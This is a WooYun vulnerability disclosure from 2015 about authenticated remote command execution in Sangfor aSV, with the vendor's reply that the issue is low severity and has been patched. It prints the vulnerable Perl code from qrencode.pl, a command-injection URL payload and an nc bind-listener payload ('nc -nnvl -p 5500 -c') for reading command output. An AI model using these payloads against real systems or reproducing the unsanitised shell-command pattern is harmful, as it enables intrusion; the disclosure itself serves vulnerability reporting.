深信服aSV漏洞第一弹之Remote Code Execution | wooyun-2015-0145283

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0145283

漏洞标题：

深信服aSV漏洞第一弹之Remote Code Execution

漏洞详情

披露状态：

2015-10-08：细节已通知厂商并且等待厂商处理中
2015-10-09：厂商已经确认，细节仅向厂商公开
2015-10-12：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

perl脚本有问题，有软waf也没用

详细说明：

利用此漏洞前提：需要登陆aSV控制台
而且权限较低（www-data），所以自评漏洞为中
问题代码出在qrencode.pl上，程序猿自己回去检查

#!/usr/bin/perl -w
#1、获取传入参数
my $r = Apache2::RequestUtil->request();
my $cgi = CGI->new($r);
my $need_encode_intext = $cgi->param( 'need_encode_intext' );
exit (0) if(!defined($need_encode_intext) || ($need_encode_intext eq ""));
#2、根据传入参数得到二维码图片
my $qrencode_png_name = 'tmp_qrencode.png';
my $qrencode_png_path = "/tmp/$qrencode_png_name";
my $errmsg="";
eval {
	#如果图片存在，那么就删除
	if(-f $qrencode_png_path) {
		unlink $qrencode_png_path or lerror("Failed unlink ${qrencode_png_path}, err: $!");
	}
	#转换得到二维码图片
	my $cmdstr = "/usr/bin/qrencode  -o  ${qrencode_png_path} ${need_encode_intext}";
	VTP::Tools::run_command($cmdstr,errfunc => sub { $errmsg = $errmsg . shift . "\n"; });
};

你们懂的，问题出在my $cmdstr = "/usr/bin/qrencode -o ${qrencode_png_path} ${need_encode_intext}";
登陆aSV后访问

/qrencode.pl?need_encode_intext=123|系统命令

即可执行系统命令，不过这里继承了apache的用户组www-data，所以权限较低
那么要怎么样获得命令回显呢，利用NC的-c参数

/qrencode.pl?need_encode_intext=123|nc -nnvl -p 5500 -c 'id'

访问上面URL后telnet aSV的5500端口即可看到命令回显

漏洞证明：

修复方案：

你们懂的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2015-10-09 12:52

厂商回复：

感谢白帽子提交的问题。经确认，该漏洞确实存在，不过需要先登录控制台才能利用此漏洞，利用此漏洞不能读取到任何业务数据，且权限过低，也无法进行写入操作，并不能对业务数据造成影响，考虑以上因素，我们将此漏洞危害等级评为低。目前针对该漏洞的补丁包已经发布。
感谢白帽子为我们指出问题，请白帽子私信留下联系方式，我们将为您寄送礼物以示答谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云